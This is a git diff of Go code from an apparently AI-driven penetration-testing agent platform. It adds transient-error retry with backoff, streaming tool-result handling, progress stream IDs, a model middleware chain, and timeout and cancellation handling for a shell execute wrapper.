iter = runner.Run(ctx, msgs, adk.WithCheckPointID(checkPointID))
|
|
||||||
} else {
|
|
||||||
iter = runner.Run(ctx, msgs)
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
|
transientRetrier := newEinoTransientRunRetrier(einoTransientRunRetryPolicyFromArgs(args))
|
||||||
handleRunErr := func(runErr error) error {
|
handleRunErr := func(runErr error) error {
|
||||||
if runErr == nil {
|
if runErr == nil {
|
||||||
return nil
|
return nil
|
||||||
@@ -468,26 +483,60 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
|||||||
return runErr
|
return runErr
|
||||||
}
|
}
|
||||||
|
|
||||||
// maybeRetryTransientRun:不在此层 runner.Run/Resume;由 handler 落库 + loadHistoryFromAgentTrace 分段续跑(同中断并继续)。
|
maybeRetryTransientRun := func(runErr error) (restarted bool, fatal error) {
|
||||||
maybeRetryTransientRun := func(runErr error) (retry bool, fatal error) {
|
if runErr == nil {
|
||||||
if runErr == nil || !isEinoTransientRunError(runErr) {
|
return false, nil
|
||||||
|
}
|
||||||
|
if !isEinoTransientRunError(runErr) {
|
||||||
return false, handleRunErr(runErr)
|
return false, handleRunErr(runErr)
|
||||||
}
|
}
|
||||||
|
restarted, restartMsgs, ctxSource, backoff, retErr := transientRetrier.tryRetry(
|
||||||
|
ctx, runErr, args, baseMsgs, runAccumulatedMsgs, baseAccumulatedCount,
|
||||||
|
)
|
||||||
|
if retErr != nil {
|
||||||
|
flushAllPendingAsFailed(runErr)
|
||||||
|
if logger != nil {
|
||||||
|
logger.Warn("eino transient retry exhausted",
|
||||||
|
zap.Error(retErr),
|
||||||
|
zap.String("orchestration", orchMode),
|
||||||
|
zap.Int("maxAttempts", transientRetrier.maxAttempts()))
|
||||||
|
}
|
||||||
|
return false, retErr
|
||||||
|
}
|
||||||
|
if !restarted {
|
||||||
|
return false, nil
|
||||||
|
}
|
||||||
|
attemptNo := transientRetrier.attempt()
|
||||||
|
maxAttempts := transientRetrier.maxAttempts()
|
||||||
if logger != nil {
|
if logger != nil {
|
||||||
logger.Warn("eino transient error, ending run segment for handler resume",
|
logger.Warn("eino transient error, retrying after backoff",
|
||||||
zap.Error(runErr),
|
zap.Error(runErr),
|
||||||
zap.String("orchestration", orchMode))
|
zap.String("orchestration", orchMode),
|
||||||
|
zap.Int("attempt", attemptNo),
|
||||||
|
zap.Int("maxAttempts", maxAttempts),
|
||||||
|
zap.Duration("backoff", backoff))
|
||||||
}
|
}
|
||||||
if progress != nil {
|
if progress != nil {
|
||||||
progress("eino_run_retry", "遇到临时错误(限流或网络波动),将保存上下文并重试…", map[string]interface{}{
|
progress("eino_run_retry", fmt.Sprintf("遇到临时错误(限流或网络波动),%d 秒后第 %d/%d 次重试…", int(backoff.Seconds()), attemptNo, maxAttempts), map[string]interface{}{
|
||||||
"conversationId": conversationID,
|
"conversationId": conversationID,
|
||||||
"source": "eino",
|
"source": "eino",
|
||||||
"orchestration": orchMode,
|
"orchestration": orchMode,
|
||||||
"error": runErr.Error(),
|
"error": runErr.Error(),
|
||||||
"resumeKind": "trace_segment",
|
"attempt": attemptNo,
|
||||||
|
"maxAttempts": maxAttempts,
|
||||||
|
"backoffSec": int(backoff.Seconds()),
|
||||||
|
})
|
||||||
|
progress("eino_run_retry", "已恢复上下文,正在重试…", map[string]interface{}{
|
||||||
|
"conversationId": conversationID,
|
||||||
|
"source": "eino",
|
||||||
|
"orchestration": orchMode,
|
||||||
|
"attempt": attemptNo,
|
||||||
|
"contextSource": string(ctxSource),
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
return false, ErrTransientRetryContinue
|
msgs = restartMsgs
|
||||||
|
iter = startRunnerIter(msgs)
|
||||||
|
return true, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
takePartial := func(runErr error) (*RunResult, error) {
|
takePartial := func(runErr error) (*RunResult, error) {
|
||||||
@@ -571,9 +620,15 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
|||||||
continue
|
continue
|
||||||
}
|
}
|
||||||
if ev.Err != nil {
|
if ev.Err != nil {
|
||||||
if _, retErr := maybeRetryTransientRun(ev.Err); retErr != nil {
|
restarted, retErr := maybeRetryTransientRun(ev.Err)
|
||||||
|
if retErr != nil {
|
||||||
return takePartial(retErr)
|
return takePartial(retErr)
|
||||||
}
|
}
|
||||||
|
if restarted {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
transientRetrier.reset()
|
||||||
}
|
}
|
||||||
if ev.AgentName != "" && progress != nil {
|
if ev.AgentName != "" && progress != nil {
|
||||||
iterEinoAgent := orchestratorName
|
iterEinoAgent := orchestratorName
|
||||||
@@ -618,20 +673,68 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
// 仅在代理切换时更新进度标题;同一代理的每个 ADK 事件不再重复刷 progress。
|
||||||
|
if einoLastAgent != ev.AgentName {
|
||||||
|
progress("progress", fmt.Sprintf("[Eino] %s", ev.AgentName), map[string]interface{}{
|
||||||
|
"conversationId": conversationID,
|
||||||
|
"einoAgent": ev.AgentName,
|
||||||
|
"einoRole": einoRoleTag(ev.AgentName),
|
||||||
|
"orchestration": orchMode,
|
||||||
|
})
|
||||||
|
}
|
||||||
einoLastAgent = ev.AgentName
|
einoLastAgent = ev.AgentName
|
||||||
progress("progress", fmt.Sprintf("[Eino] %s", ev.AgentName), map[string]interface{}{
|
|
||||||
"conversationId": conversationID,
|
|
||||||
"einoAgent": ev.AgentName,
|
|
||||||
"einoRole": einoRoleTag(ev.AgentName),
|
|
||||||
"orchestration": orchMode,
|
|
||||||
})
|
|
||||||
}
|
}
|
||||||
if ev.Output == nil || ev.Output.MessageOutput == nil {
|
if ev.Output == nil || ev.Output.MessageOutput == nil {
|
||||||
continue
|
continue
|
||||||
}
|
}
|
||||||
mv := ev.Output.MessageOutput
|
mv := ev.Output.MessageOutput
|
||||||
|
|
||||||
|
if mv.IsStreaming && mv.MessageStream != nil && mv.Role == schema.Tool {
|
||||||
|
toolName := strings.TrimSpace(mv.ToolName)
|
||||||
|
var toolBuf strings.Builder
|
||||||
|
streamToolCallID := ""
|
||||||
|
var toolStreamRecvErr error
|
||||||
|
for {
|
||||||
|
chunk, rerr := mv.MessageStream.Recv()
|
||||||
|
if errors.Is(rerr, io.EOF) {
|
||||||
|
break
|
||||||
|
}
|
||||||
|
if rerr != nil {
|
||||||
|
toolStreamRecvErr = rerr
|
||||||
|
break
|
||||||
|
}
|
||||||
|
if chunk == nil {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
if chunk.Content != "" {
|
||||||
|
toolBuf.WriteString(chunk.Content)
|
||||||
|
}
|
||||||
|
if tid := strings.TrimSpace(chunk.ToolCallID); tid != "" {
|
||||||
|
streamToolCallID = tid
|
||||||
|
}
|
||||||
|
}
|
||||||
|
content := toolBuf.String()
|
||||||
|
isErr := false
|
||||||
|
if strings.HasPrefix(content, einomcp.ToolErrorPrefix) {
|
||||||
|
isErr = true
|
||||||
|
content = strings.TrimPrefix(content, einomcp.ToolErrorPrefix)
|
||||||
|
}
|
||||||
|
if streamToolCallID != "" {
|
||||||
|
opts := []schema.ToolMessageOption{schema.WithToolName(toolName)}
|
||||||
|
runAccumulatedMsgs = append(runAccumulatedMsgs, schema.ToolMessage(content, streamToolCallID, opts...))
|
||||||
|
}
|
||||||
|
tryEmitToolResultProgress(toolName, content, streamToolCallID, isErr, ev.AgentName)
|
||||||
|
if toolStreamRecvErr != nil && logger != nil {
|
||||||
|
logger.Warn("eino tool result stream recv error",
|
||||||
|
zap.Error(toolStreamRecvErr),
|
||||||
|
zap.String("agent", ev.AgentName),
|
||||||
|
zap.String("tool", toolName))
|
||||||
|
}
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
if mv.IsStreaming && mv.MessageStream != nil {
|
if mv.IsStreaming && mv.MessageStream != nil {
|
||||||
|
mainStreamID := fmt.Sprintf("eino-main-%s-%d", conversationID, atomic.AddInt64(&mainResponseStreamSeq, 1))
|
||||||
streamHeaderSent := false
|
streamHeaderSent := false
|
||||||
var reasoningStreamID string
|
var reasoningStreamID string
|
||||||
var toolStreamFragments []schema.ToolCall
|
var toolStreamFragments []schema.ToolCall
|
||||||
@@ -738,6 +841,8 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
|||||||
"einoRole": "orchestrator",
|
"einoRole": "orchestrator",
|
||||||
"einoAgent": ev.AgentName,
|
"einoAgent": ev.AgentName,
|
||||||
"orchestration": orchMode,
|
"orchestration": orchMode,
|
||||||
|
"iteration": einoMainRound,
|
||||||
|
"streamId": mainStreamID,
|
||||||
})
|
})
|
||||||
streamHeaderSent = true
|
streamHeaderSent = true
|
||||||
}
|
}
|
||||||
@@ -747,6 +852,8 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
|||||||
"einoRole": "orchestrator",
|
"einoRole": "orchestrator",
|
||||||
"einoAgent": ev.AgentName,
|
"einoAgent": ev.AgentName,
|
||||||
"orchestration": orchMode,
|
"orchestration": orchMode,
|
||||||
|
"iteration": einoMainRound,
|
||||||
|
"streamId": mainStreamID,
|
||||||
}, mainAssistantBuf))
|
}, mainAssistantBuf))
|
||||||
mainAssistWireAccum, _ = normalizeStreamingDelta(mainAssistWireAccum, contentDelta)
|
mainAssistWireAccum, _ = normalizeStreamingDelta(mainAssistWireAccum, contentDelta)
|
||||||
}
|
}
|
||||||
@@ -779,6 +886,16 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
if progress != nil && reasoningStreamID != "" && strings.TrimSpace(reasoningBuf) != "" {
|
||||||
|
progress("reasoning_chain_stream_end", openai.DisplayReasoningContent(strings.TrimSpace(reasoningBuf)), map[string]interface{}{
|
||||||
|
"streamId": reasoningStreamID,
|
||||||
|
"conversationId": conversationID,
|
||||||
|
"source": "eino",
|
||||||
|
"einoAgent": ev.AgentName,
|
||||||
|
"einoRole": einoRoleTag(ev.AgentName),
|
||||||
|
"orchestration": orchMode,
|
||||||
|
})
|
||||||
|
}
|
||||||
if streamsMainAssistant(ev.AgentName) {
|
if streamsMainAssistant(ev.AgentName) {
|
||||||
s := strings.TrimSpace(mainAssistantBuf)
|
s := strings.TrimSpace(mainAssistantBuf)
|
||||||
if mainAssistDupTarget != "" {
|
if mainAssistDupTarget != "" {
|
||||||
@@ -806,6 +923,8 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
|||||||
"einoRole": "orchestrator",
|
"einoRole": "orchestrator",
|
||||||
"einoAgent": ev.AgentName,
|
"einoAgent": ev.AgentName,
|
||||||
"orchestration": orchMode,
|
"orchestration": orchMode,
|
||||||
|
"iteration": einoMainRound,
|
||||||
|
"streamId": mainStreamID,
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
progress("response_delta", eofTail, openai.WithSSEAccumulated(map[string]interface{}{
|
progress("response_delta", eofTail, openai.WithSSEAccumulated(map[string]interface{}{
|
||||||
@@ -814,6 +933,8 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
|||||||
"einoRole": "orchestrator",
|
"einoRole": "orchestrator",
|
||||||
"einoAgent": ev.AgentName,
|
"einoAgent": ev.AgentName,
|
||||||
"orchestration": orchMode,
|
"orchestration": orchMode,
|
||||||
|
"iteration": einoMainRound,
|
||||||
|
"streamId": mainStreamID,
|
||||||
}, mainAssistantBuf))
|
}, mainAssistantBuf))
|
||||||
mainAssistWireAccum, _ = normalizeStreamingDelta(mainAssistWireAccum, eofTail)
|
mainAssistWireAccum, _ = normalizeStreamingDelta(mainAssistWireAccum, eofTail)
|
||||||
}
|
}
|
||||||
@@ -873,9 +994,13 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
|||||||
"einoRole": einoRoleTag(ev.AgentName),
|
"einoRole": einoRoleTag(ev.AgentName),
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
if _, retErr := maybeRetryTransientRun(streamRecvErr); retErr != nil {
|
restarted, retErr := maybeRetryTransientRun(streamRecvErr)
|
||||||
|
if retErr != nil {
|
||||||
return takePartial(retErr)
|
return takePartial(retErr)
|
||||||
}
|
}
|
||||||
|
if restarted {
|
||||||
|
continue
|
||||||
|
}
|
||||||
}
|
}
|
||||||
continue
|
continue
|
||||||
}
|
}
|
||||||
@@ -916,6 +1041,7 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
|||||||
}
|
}
|
||||||
executeStdoutDupMu.Unlock()
|
executeStdoutDupMu.Unlock()
|
||||||
if progress != nil {
|
if progress != nil {
|
||||||
|
nonStreamID := fmt.Sprintf("eino-main-%s-%d", conversationID, atomic.AddInt64(&mainResponseStreamSeq, 1))
|
||||||
progress("response_start", "", map[string]interface{}{
|
progress("response_start", "", map[string]interface{}{
|
||||||
"conversationId": conversationID,
|
"conversationId": conversationID,
|
||||||
"mcpExecutionIds": snapshotMCPIDs(),
|
"mcpExecutionIds": snapshotMCPIDs(),
|
||||||
@@ -923,6 +1049,8 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
|||||||
"einoRole": "orchestrator",
|
"einoRole": "orchestrator",
|
||||||
"einoAgent": ev.AgentName,
|
"einoAgent": ev.AgentName,
|
||||||
"orchestration": orchMode,
|
"orchestration": orchMode,
|
||||||
|
"iteration": einoMainRound,
|
||||||
|
"streamId": nonStreamID,
|
||||||
})
|
})
|
||||||
progress("response_delta", body, openai.WithSSEAccumulated(map[string]interface{}{
|
progress("response_delta", body, openai.WithSSEAccumulated(map[string]interface{}{
|
||||||
"conversationId": conversationID,
|
"conversationId": conversationID,
|
||||||
@@ -930,6 +1058,8 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
|||||||
"einoRole": "orchestrator",
|
"einoRole": "orchestrator",
|
||||||
"einoAgent": ev.AgentName,
|
"einoAgent": ev.AgentName,
|
||||||
"orchestration": orchMode,
|
"orchestration": orchMode,
|
||||||
|
"iteration": einoMainRound,
|
||||||
|
"streamId": nonStreamID,
|
||||||
}, body))
|
}, body))
|
||||||
}
|
}
|
||||||
lastAssistant = body
|
lastAssistant = body
|
||||||
@@ -948,7 +1078,7 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
if mv.Role == schema.Tool && progress != nil {
|
if (mv.Role == schema.Tool || msg.Role == schema.Tool) && progress != nil {
|
||||||
toolName := msg.ToolName
|
toolName := msg.ToolName
|
||||||
if toolName == "" {
|
if toolName == "" {
|
||||||
toolName = mv.ToolName
|
toolName = mv.ToolName
|
||||||
@@ -961,46 +1091,8 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
|
|||||||
content = strings.TrimPrefix(content, einomcp.ToolErrorPrefix)
|
content = strings.TrimPrefix(content, einomcp.ToolErrorPrefix)
|
||||||
}
|
}
|
||||||
|
|
||||||
preview := content
|
|
||||||
if len(preview) > 200 {
|
|
||||||
preview = preview[:200] + "..."
|
|
||||||
}
|
|
||||||
data := map[string]interface{}{
|
|
||||||
"toolName": toolName,
|
|
||||||
"success": !isErr,
|
|
||||||
"isError": isErr,
|
|
||||||
"result": content,
|
|
||||||
"resultPreview": preview,
|
|
||||||
"conversationId": conversationID,
|
|
||||||
"einoAgent": ev.AgentName,
|
|
||||||
"einoRole": einoRoleTag(ev.AgentName),
|
|
||||||
"source": "eino",
|
|
||||||
}
|
|
||||||
toolCallID := strings.TrimSpace(msg.ToolCallID)
|
toolCallID := strings.TrimSpace(msg.ToolCallID)
|
||||||
if toolCallID == "" {
|
tryEmitToolResultProgress(toolName, content, toolCallID, isErr, ev.AgentName)
|
||||||
if inferred, ok := popNextPendingForAgent(ev.AgentName); ok {
|
|
||||||
toolCallID = inferred.ToolCallID
|
|
||||||
} else if inferred, ok := popNextPendingForAgent(orchestratorName); ok {
|
|
||||||
toolCallID = inferred.ToolCallID
|
|
||||||
} else if inferred, ok := popNextPendingForAgent(""); ok {
|
|
||||||
toolCallID = inferred.ToolCallID
|
|
||||||
} else if inferred, ok := popAnyPending(); ok {
|
|
||||||
toolCallID = inferred.ToolCallID
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if toolCallID != "" {
|
|
||||||
removePendingByID(toolCallID)
|
|
||||||
if _, loaded := toolResultSent.LoadOrStore(toolCallID, struct{}{}); loaded {
|
|
||||||
// ToolInvokeNotify 可能已推过 tool_result(如 execute 流式包装里 Fire 仅携带截断后的 stdout),
|
|
||||||
// 此处仍应用 ADK Tool 消息中的完整内容刷新去重基准,避免模型复述全文时与截断串比对失败而重复展示「助手输出」。
|
|
||||||
recordPendingExecuteStdoutDup(toolName, content, isErr)
|
|
||||||
continue
|
|
||||||
}
|
|
||||||
data["toolCallId"] = toolCallID
|
|
||||||
}
|
|
||||||
recordPendingExecuteStdoutDup(toolName, content, isErr)
|
|
||||||
recordEinoADKFilesystemToolMonitor(args.FilesystemMonitorAgent, args.FilesystemMonitorRecord, toolName, toolCallID, runAccumulatedMsgs, content, isErr)
|
|
||||||
progress("tool_result", fmt.Sprintf("工具结果 (%s)", toolName), data)
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@@ -0,0 +1,50 @@
|
|||||||
|
package multiagent
|
||||||
|
|
||||||
|
import (
|
||||||
|
"github.com/cloudwego/eino/adk"
|
||||||
|
"go.uber.org/zap"
|
||||||
|
)
|
||||||
|
|
||||||
|
// einoChatModelTailConfig configures middleware appended after reduction/skill/plantask
|
||||||
|
// and immediately before each ChatModel invocation pipeline completes.
|
||||||
|
//
|
||||||
|
// Order (best practice):
|
||||||
|
// 1. system merge — accurate token count for summarization
|
||||||
|
// 2. continuation user dedup — drop stale session-resume injections
|
||||||
|
// 3. summarization
|
||||||
|
// 4. orphan tool prune
|
||||||
|
// 5. telemetry
|
||||||
|
// 6. model-facing trace snapshot
|
||||||
|
type einoChatModelTailConfig struct {
|
||||||
|
logger *zap.Logger
|
||||||
|
phase string
|
||||||
|
summarization adk.ChatModelAgentMiddleware
|
||||||
|
modelName string
|
||||||
|
conversationID string
|
||||||
|
trace *modelFacingTraceHolder
|
||||||
|
skipOrphanPruner bool
|
||||||
|
skipTelemetry bool
|
||||||
|
skipTrace bool
|
||||||
|
}
|
||||||
|
|
||||||
|
func appendEinoChatModelTailMiddlewares(handlers []adk.ChatModelAgentMiddleware, cfg einoChatModelTailConfig) []adk.ChatModelAgentMiddleware {
|
||||||
|
handlers = append(handlers, newSystemMessageNormalizerMiddleware(cfg.logger, cfg.phase))
|
||||||
|
handlers = append(handlers, newContinuationUserDedupMiddleware(cfg.logger, cfg.phase))
|
||||||
|
if cfg.summarization != nil {
|
||||||
|
handlers = append(handlers, cfg.summarization)
|
||||||
|
}
|
||||||
|
if !cfg.skipOrphanPruner {
|
||||||
|
handlers = append(handlers, newOrphanToolPrunerMiddleware(cfg.logger, cfg.phase))
|
||||||
|
}
|
||||||
|
if !cfg.skipTelemetry {
|
||||||
|
if teleMw := newEinoModelInputTelemetryMiddleware(cfg.logger, cfg.modelName, cfg.conversationID, cfg.phase); teleMw != nil {
|
||||||
|
handlers = append(handlers, teleMw)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if !cfg.skipTrace && cfg.trace != nil {
|
||||||
|
if capMw := newModelFacingTraceMiddleware(cfg.trace); capMw != nil {
|
||||||
|
handlers = append(handlers, capMw)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return handlers
|
||||||
|
}
|
||||||
@@ -9,8 +9,8 @@ import (
|
|||||||
|
|
||||||
// newEinoExecuteMonitorCallback 在 Eino filesystem execute 结束时写入 MCP 监控库并 recorder(executionId),
|
// newEinoExecuteMonitorCallback 在 Eino filesystem execute 结束时写入 MCP 监控库并 recorder(executionId),
|
||||||
// 与 CallTool 路径一致,供助手消息展示「渗透测试详情」芯片。
|
// 与 CallTool 路径一致,供助手消息展示「渗透测试详情」芯片。
|
||||||
func newEinoExecuteMonitorCallback(ag *agent.Agent, recorder einomcp.ExecutionRecorder) func(command, stdout string, success bool, invokeErr error) {
|
func newEinoExecuteMonitorCallback(ag *agent.Agent, recorder einomcp.ExecutionRecorder) func(toolCallID, command, stdout string, success bool, invokeErr error) {
|
||||||
return func(command, stdout string, success bool, invokeErr error) {
|
return func(toolCallID, command, stdout string, success bool, invokeErr error) {
|
||||||
if ag == nil || recorder == nil {
|
if ag == nil || recorder == nil {
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
@@ -25,7 +25,7 @@ func newEinoExecuteMonitorCallback(ag *agent.Agent, recorder einomcp.ExecutionRe
|
|||||||
args := map[string]interface{}{"command": command}
|
args := map[string]interface{}{"command": command}
|
||||||
id := ag.RecordLocalToolExecution("execute", args, stdout, err)
|
id := ag.RecordLocalToolExecution("execute", args, stdout, err)
|
||||||
if id != "" {
|
if id != "" {
|
||||||
recorder(id)
|
recorder(id, toolCallID)
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -6,9 +6,11 @@ import (
|
|||||||
"fmt"
|
"fmt"
|
||||||
"io"
|
"io"
|
||||||
"strings"
|
"strings"
|
||||||
|
"sync"
|
||||||
"time"
|
"time"
|
||||||
|
|
||||||
"cyberstrike-ai/internal/einomcp"
|
"cyberstrike-ai/internal/einomcp"
|
||||||
|
"cyberstrike-ai/internal/mcp"
|
||||||
"cyberstrike-ai/internal/security"
|
"cyberstrike-ai/internal/security"
|
||||||
|
|
||||||
"github.com/cloudwego/eino/adk/filesystem"
|
"github.com/cloudwego/eino/adk/filesystem"
|
||||||
@@ -34,6 +36,15 @@ func einoExecuteTimeoutUserHint() string {
|
|||||||
return "已超时终止 · Timed out"
|
return "已超时终止 · Timed out"
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// einoExecuteRecvErrIsToolTimeout 判断 Recv 错误是否由 agent.tool_timeout_minutes 触发。
|
||||||
|
// WithTimeout 到期后 local 侧常报 canceled / exit -1,但 execCtx.Err() 仍为 DeadlineExceeded。
|
||||||
|
func einoExecuteRecvErrIsToolTimeout(rerr error, tctx context.Context) bool {
|
||||||
|
if tctx != nil && errors.Is(tctx.Err(), context.DeadlineExceeded) {
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
return errors.Is(rerr, context.DeadlineExceeded)
|
||||||
|
}
|
||||||
|
|
||||||
// einoStreamingShellWrap 包装 Eino filesystem 使用的 StreamingShell(cloudwego eino-ext local.Local)。
|
// einoStreamingShellWrap 包装 Eino filesystem 使用的 StreamingShell(cloudwego eino-ext local.Local)。
|
||||||
// 官方 execute 工具默认走 ExecuteStreaming 且不设 RunInBackendGround;末尾带 & 时子进程仍与管道相连,
|
// 官方 execute 工具默认走 ExecuteStreaming 且不设 RunInBackendGround;末尾带 & 时子进程仍与管道相连,
|
||||||
// streamStdout 按行读取会在无换行输出时长时间阻塞(与 MCP 工具 exec 的独立实现不同)。
|
// streamStdout 按行读取会在无换行输出时长时间阻塞(与 MCP 工具 exec 的独立实现不同)。
|
||||||
@@ -53,7 +64,7 @@ type einoStreamingShellWrap struct {
|
|||||||
// toolTimeoutMinutes 与 agent.tool_timeout_minutes 对齐;>0 时对单次 execute 套用 context 超时(与 MCP 工具经 executeToolViaMCP 行为一致)。0 表示仅依赖上层 ctx(如整任务 10h 上限)。
|
// toolTimeoutMinutes 与 agent.tool_timeout_minutes 对齐;>0 时对单次 execute 套用 context 超时(与 MCP 工具经 executeToolViaMCP 行为一致)。0 表示仅依赖上层 ctx(如整任务 10h 上限)。
|
||||||
toolTimeoutMinutes int
|
toolTimeoutMinutes int
|
||||||
// recordMonitor 在 execute 流结束后写入 tool_executions 并 recorder(executionId),使「渗透测试详情」与常规 MCP 一致。
|
// recordMonitor 在 execute 流结束后写入 tool_executions 并 recorder(executionId),使「渗透测试详情」与常规 MCP 一致。
|
||||||
recordMonitor func(command, stdout string, success bool, invokeErr error)
|
recordMonitor func(toolCallID, command, stdout string, success bool, invokeErr error)
|
||||||
}
|
}
|
||||||
|
|
||||||
func (w *einoStreamingShellWrap) ExecuteStreaming(ctx context.Context, input *filesystem.ExecuteRequest) (*schema.StreamReader[*filesystem.ExecuteResponse], error) {
|
func (w *einoStreamingShellWrap) ExecuteStreaming(ctx context.Context, input *filesystem.ExecuteRequest) (*schema.StreamReader[*filesystem.ExecuteResponse], error) {
|
||||||
@@ -71,27 +82,48 @@ func (w *einoStreamingShellWrap) ExecuteStreaming(ctx context.Context, input *fi
|
|||||||
req.Command = prependPythonUnbufferedEnv(req.Command)
|
req.Command = prependPythonUnbufferedEnv(req.Command)
|
||||||
tid := strings.TrimSpace(compose.GetToolCallID(ctx))
|
tid := strings.TrimSpace(compose.GetToolCallID(ctx))
|
||||||
agentTag := strings.TrimSpace(w.einoAgentName)
|
agentTag := strings.TrimSpace(w.einoAgentName)
|
||||||
|
convID := mcp.MCPConversationIDFromContext(ctx)
|
||||||
|
execReg := mcp.EinoExecuteRunRegistryFromContext(ctx)
|
||||||
|
|
||||||
execCtx := ctx
|
execCtx, execCancel := context.WithCancel(ctx)
|
||||||
var execCancel context.CancelFunc
|
var timeoutCancel context.CancelFunc
|
||||||
if w.toolTimeoutMinutes > 0 {
|
if w.toolTimeoutMinutes > 0 {
|
||||||
execCtx, execCancel = context.WithTimeout(ctx, time.Duration(w.toolTimeoutMinutes)*time.Minute)
|
execCtx, timeoutCancel = context.WithTimeout(execCtx, time.Duration(w.toolTimeoutMinutes)*time.Minute)
|
||||||
|
}
|
||||||
|
if execReg != nil && convID != "" {
|
||||||
|
execReg.RegisterActiveEinoExecute(convID, execCancel)
|
||||||
}
|
}
|
||||||
|
|
||||||
sr, err := w.inner.ExecuteStreaming(execCtx, &req)
|
sr, err := w.inner.ExecuteStreaming(execCtx, &req)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
|
if timeoutCancel != nil {
|
||||||
|
timeoutCancel()
|
||||||
|
}
|
||||||
if execCancel != nil {
|
if execCancel != nil {
|
||||||
execCancel()
|
execCancel()
|
||||||
}
|
}
|
||||||
|
if einoExecuteRecvErrIsToolTimeout(err, execCtx) {
|
||||||
|
hint := "\n\n" + einoExecuteTimeoutUserHint() + "\n"
|
||||||
|
if w.recordMonitor != nil {
|
||||||
|
w.recordMonitor(tid, userCmd, hint, false, context.DeadlineExceeded)
|
||||||
|
}
|
||||||
|
if w.invokeNotify != nil && tid != "" {
|
||||||
|
w.invokeNotify.Fire(tid, "execute", agentTag, false, hint, context.DeadlineExceeded)
|
||||||
|
}
|
||||||
|
return schema.StreamReaderFromArray([]*filesystem.ExecuteResponse{{Output: hint}}), nil
|
||||||
|
}
|
||||||
if w.recordMonitor != nil {
|
if w.recordMonitor != nil {
|
||||||
w.recordMonitor(userCmd, "", false, err)
|
w.recordMonitor(tid, userCmd, "", false, err)
|
||||||
}
|
}
|
||||||
if w.invokeNotify != nil && tid != "" {
|
if w.invokeNotify != nil && tid != "" {
|
||||||
w.invokeNotify.Fire(tid, "execute", agentTag, false, "", err)
|
w.invokeNotify.Fire(tid, "execute", agentTag, false, "", err)
|
||||||
}
|
}
|
||||||
return nil, err
|
return nil, err
|
||||||
}
|
}
|
||||||
if sr == nil || w.invokeNotify == nil || tid == "" {
|
if sr == nil || w.invokeNotify == nil {
|
||||||
|
if timeoutCancel != nil {
|
||||||
|
timeoutCancel()
|
||||||
|
}
|
||||||
if execCancel != nil {
|
if execCancel != nil {
|
||||||
execCancel()
|
execCancel()
|
||||||
}
|
}
|
||||||
@@ -100,14 +132,34 @@ func (w *einoStreamingShellWrap) ExecuteStreaming(ctx context.Context, input *fi
|
|||||||
|
|
||||||
outR, outW := schema.Pipe[*filesystem.ExecuteResponse](32)
|
outR, outW := schema.Pipe[*filesystem.ExecuteResponse](32)
|
||||||
|
|
||||||
go func(inner *schema.StreamReader[*filesystem.ExecuteResponse], command string, cancel context.CancelFunc, tctx context.Context) {
|
go func(inner *schema.StreamReader[*filesystem.ExecuteResponse], command string, cancel context.CancelFunc, timeoutCleanup context.CancelFunc, tctx context.Context, conversationID string, reg mcp.EinoExecuteRunRegistry) {
|
||||||
defer inner.Close()
|
var innerCloseOnce sync.Once
|
||||||
|
closeInner := func() {
|
||||||
|
innerCloseOnce.Do(func() { inner.Close() })
|
||||||
|
}
|
||||||
|
defer closeInner()
|
||||||
|
if timeoutCleanup != nil {
|
||||||
|
defer timeoutCleanup()
|
||||||
|
}
|
||||||
if cancel != nil {
|
if cancel != nil {
|
||||||
defer cancel()
|
defer cancel()
|
||||||
}
|
}
|
||||||
|
if reg != nil && conversationID != "" {
|
||||||
|
defer reg.UnregisterActiveEinoExecute(conversationID)
|
||||||
|
}
|
||||||
|
|
||||||
|
// ctx 取消时关闭内层流,避免 amass 等长时间无换行输出时 Recv 永久阻塞。
|
||||||
|
stopWatch := make(chan struct{})
|
||||||
|
go func() {
|
||||||
|
select {
|
||||||
|
case <-tctx.Done():
|
||||||
|
closeInner()
|
||||||
|
case <-stopWatch:
|
||||||
|
}
|
||||||
|
}()
|
||||||
|
defer close(stopWatch)
|
||||||
|
|
||||||
var sb strings.Builder
|
var sb strings.Builder
|
||||||
